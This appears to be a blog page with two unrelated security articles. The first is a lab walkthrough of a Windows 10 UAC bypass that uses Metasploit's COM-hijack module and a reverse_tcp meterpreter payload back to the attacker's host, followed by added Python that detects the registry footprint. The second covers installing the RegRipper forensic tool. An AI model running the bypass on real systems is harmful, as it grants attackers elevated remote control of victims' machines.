Tuesday, August 22, 2017

Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Account Control (UAC) on a targeted system. This is a post-exploitation step: the attacker must first exploit the target system and only then escalate privileges with the UAC Protection Bypass via COM Handler Hijack module.
Let's start!!
Attacker: Kali Linux
Target: Windows 10
First exploit the target to receive a meterpreter session on the victim's system. Once you have meterpreter session 1, type the following commands to check the current user and its privileges:
getuid
getprivs
From the given image you can perceive that the attacker is inside the meterpreter shell of the victim's system but does not have system/admin authority or privileges. Hence we need to bypass the UAC protection of the targeted system.
To perform this attack you need to manually add the bypass_comhijack exploit to the Metasploit framework.
Copy the entire content of "bypass_comhijack" from here, paste it into a text document and save it as bypass_comhijack.rb inside the following path:
/usr/share/metasploit-framework/modules/exploits/windows/local/
From the given image you can observe that the bypass_comhijack.rb exploit has been saved; since the attacker already has a meterpreter session, he can now use this exploit to bypass UAC protection.
This module bypasses Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high-integrity processes are loaded, these registry entries are referenced, resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. The registry key modifications are cleaned up after payload invocation.
use exploit/windows/local/bypassuac_comhijack
msf exploit(bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(bypassuac_comhijack) > set session 2
msf exploit(bypassuac_comhijack) > set lhost 192.168.0.20
msf exploit(bypassuac_comhijack) > exploit
From the given image you can observe that meterpreter session 3 has opened. Now type the following commands to determine the system authority and privileges:
getsystem
getprivs
Wonderful!! The attacker got system/admin authority and privileges.
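As an added example (not part of the original post or of the Metasploit module), here is defender-side logic that parses an exported HKCU\Software\Classes\CLSID tree (`reg export HKCU\Software\Classes\CLSID clsid.reg`) and flags per-user COM handlers whose server DLL lives in a user-writable directory, the footprint the module's HKCU registry entries leave while the payload runs. The CLSIDs and paths in the sample and the USER_WRITABLE_HINTS list are constructed assumptions.

```python
import re

# Directories a standard user can write to (assumed list). A COM server DLL
# registered under HKCU from one of these is the footprint the post describes:
# a per-user handler that a high-integrity process would load.
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Key lines of a .reg export for per-user COM server registrations; the default
# value (@) beneath them holds the server path, with backslashes escaped as \\.
KEY_RE = re.compile(
    r"^\[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\(\{[0-9A-Fa-f-]+\})"
    r"\\(InprocServer32|LocalServer32)\]$", re.I)
DEFAULT_RE = re.compile(r'^@="(.*)"$')

def parse_clsid_servers(reg_text):
    """Return [(clsid, subkey, path)] for every HKCU COM server in a .reg export.
    Real exports are UTF-16 with a BOM: read them with encoding="utf-16"."""
    servers, current = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = (m.group(1), m.group(2))
            continue
        if line.startswith("["):        # any other key ends the handler context
            current = None
            continue
        m = DEFAULT_RE.match(line)
        if m and current:
            servers.append((current[0], current[1], m.group(1).replace("\\\\", "\\")))
    return servers

def suspicious_servers(reg_text):
    """Handlers whose server path sits in a user-writable directory."""
    return [(clsid, subkey, path) for clsid, subkey, path in parse_clsid_servers(reg_text)
            if any(hint in path.lower() for hint in USER_WRITABLE_HINTS)]

# Constructed sample export: two per-user handlers, one pointing into %TEMP%.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\handler.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000002}\InprocServer32]
@="C:\\Program Files\\Vendor\\vendor.dll"
"""
```

Run `suspicious_servers()` over a real export taken from a user profile; since the module cleans its keys up after use, compare against the HKCU\Software\Classes\CLSID hive of a baseline profile or watch the key for RegCreateKey events rather than relying on a single snapshot.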
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.

How to install RegRipper registry data extraction tool on Linux


RegRipper is open source forensic software used as a Windows Registry data extraction tool, available as a command line or GUI tool. It is written in Perl, and this article describes the installation of the RegRipper command line tool on Linux systems such as Debian, Ubuntu, Fedora, CentOS or Red Hat. For the most part, the installation process of the RegRipper command line tool is OS agnostic, except for the part where we deal with the installation prerequisites.

https://linuxconfig.org/how-to-install-regripper-registry-data-extraction-tool-on-linux

https://github.com/keydet89/RegRipper2.8

Pre-requisites

First we need to install all prerequisites. Choose the relevant command below based on the Linux distribution you are running:
DEBIAN/UBUNTU
# apt-get install cpanminus make unzip wget
FEDORA
# dnf install perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which
CENTOS/REDHAT
# yum install perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which

Installation of required libraries

The RegRipper command line tool depends on the Perl Parse::Win32Registry library. The following commands take care of this prerequisite and install the library into the /usr/local/lib/rip-lib directory:
# mkdir /usr/local/lib/rip-lib
# cpanm -l /usr/local/lib/rip-lib Parse::Win32Registry

RegRipper script installation

At this stage we are ready to install the rip.pl script. The script is intended to run on MS Windows systems, so we need to make some small modifications; we will also add the path to the Parse::Win32Registry library installed above. Download the RegRipper source code from https://regripper.googlecode.com/files/ (Google Code has since shut down; the project now lives in the GitHub repository linked above). The current version is 2.8:
# wget -q https://regripper.googlecode.com/files/rrv2.8.zip
Extract rip.pl script:
# unzip -q rrv2.8.zip rip.pl
Remove the interpreter line and the unwanted DOS line ending characters (^M):
# tail -n +2 rip.pl > rip
# perl -pi -e 'tr[\r][]d' rip
Modify the script to include an interpreter relevant to your Linux system and the library path to Parse::Win32Registry:
# sed -i "1i #!`which perl`" rip
# sed -i '2i use lib qw(/usr/local/lib/rip-lib/lib/perl5/);' rip
Install your RegRipper rip script and make it executable:
# cp rip /usr/local/bin
# chmod +x /usr/local/bin/rip

RegRipper Plugins installation

Lastly, we need to install RegRipper's plugins:
# wget -q https://regripper.googlecode.com/files/plugins20130429.zip
# mkdir /usr/local/bin/plugins
# unzip -q plugins20130429.zip -d /usr/local/bin/plugins
The RegRipper registry data extraction tool is now installed on your system and available via the rip command:
# rip
Rip v.2.8 - CLI RegRipper tool
Rip [-r Reg hive file] [-f plugin file] [-p plugin module] [-l] [-h]
Parse Windows Registry files, using either a single module, or a plugins file.

  -r Reg hive file...Registry hive file to parse
  -g ................Guess the hive file (experimental)
  -f [profile].......use the plugin file (default: plugins\plugins)
  -p plugin module...use only this module
  -l ................list all plugins
  -c ................Output list in CSV format (use with -l)
  -s system name.....Server name (TLN support)
  -u username........User name (TLN support)
  -h.................Help (print this information)
  
Ex: C:\>rip -r c:\case\system -f system
    C:\>rip -r c:\case\ntuser.dat -p userassist
    C:\>rip -l -c

All output goes to STDOUT; use redirection (ie, > or >>) to output to a file.
  
copyright 2013 Quantum Analytics Research, LLC

RegRipper command examples

A few examples using RegRipper with an NTUSER.DAT registry hive file.

List all available plugins:

$ rip -l -c
List software installed by the user:
$ rip -p listsoft -r NTUSER.DAT
Launching listsoft v.20080324
listsoft v.20080324
(NTUSER.DAT) Lists contents of user's Software key

listsoft v.20080324
List the contents of the Software key in the NTUSER.DAT hive
file, in order by LastWrite time.

Mon Dec 14 06:06:41 2015Z       Google
Mon Dec 14 05:54:33 2015Z       Microsoft
Sun Dec 29 16:44:47 2013Z       Bitstream
Sun Dec 29 16:33:11 2013Z       Adobe
Sun Dec 29 12:56:03 2013Z       Corel
Thu Dec 12 07:34:40 2013Z       Clients
Thu Dec 12 07:34:40 2013Z       Mozilla
Thu Dec 12 07:30:08 2013Z       MozillaPlugins
Thu Dec 12 07:22:34 2013Z       AppDataLow
Thu Dec 12 07:22:34 2013Z       Wow6432Node
Thu Dec 12 07:22:32 2013Z       Policies
Extract all available information using every NTUSER.DAT plugin and save it to the case1.txt file:
$ for i in $(rip -l -c | grep NTUSER.DAT | cut -d , -f1); do rip -p "$i" -r NTUSER.DAT >> case1.txt 2>&1; done
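The loop above appends every plugin's output to one file. As an added example (not part of the article or of RegRipper itself), the following Python wrapper does the same but writes one file per plugin, so a plugin that fails on this hive leaves its error beside its own output. It assumes rip is on PATH and that `rip -l -c` prints plugin,version,hive,description per line, the column order the article's grep/cut pipeline relies on; the SAMPLE_LISTING is constructed.

```python
import csv
import io
import subprocess
from pathlib import Path


def plugins_for_hive(listing_csv, hive):
    """Plugin names from `rip -l -c` output whose hive column mentions `hive`.

    Assumed line format: plugin,version,hive,description (the article's
    grep/cut loop relies on the same column order).
    """
    names = set()
    for row in csv.reader(io.StringIO(listing_csv)):
        if len(row) >= 3 and hive.lower() in row[2].lower():
            names.add(row[0].strip())
    return sorted(names)


def run_plugins(hive_path, hive_name, outdir, rip="rip"):
    """Run every matching plugin against hive_path, one output file per plugin.

    Returns {plugin: exit status}. stderr goes into the same per-plugin file, so
    a plugin that fails on this hive leaves its error beside its own output
    instead of being buried in a single combined case file.
    """
    listing = subprocess.run([rip, "-l", "-c"], capture_output=True,
                             text=True, check=True).stdout
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    status = {}
    for name in plugins_for_hive(listing, hive_name):
        proc = subprocess.run([rip, "-r", str(hive_path), "-p", name],
                              capture_output=True, text=True)
        (outdir / f"{name}.txt").write_text(proc.stdout + proc.stderr)
        status[name] = proc.returncode
    return status


# Constructed listing in the assumed `rip -l -c` format (versions made up
# except listsoft, which the article shows).
SAMPLE_LISTING = """listsoft,20080324,NTUSER.DAT,Lists contents of user's Software key
userassist,20130603,NTUSER.DAT,Displays contents of UserAssist subkeys
shellfolders,20100826,NTUSER.DAT,Gets user's shell folders values
winver,20081210,Software,Get Windows version
"""

if __name__ == "__main__":
    # Usage: python rip_all.py  (expects rip on PATH and ./NTUSER.DAT)
    print(run_plugins("NTUSER.DAT", "NTUSER.DAT", "case1"))
```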
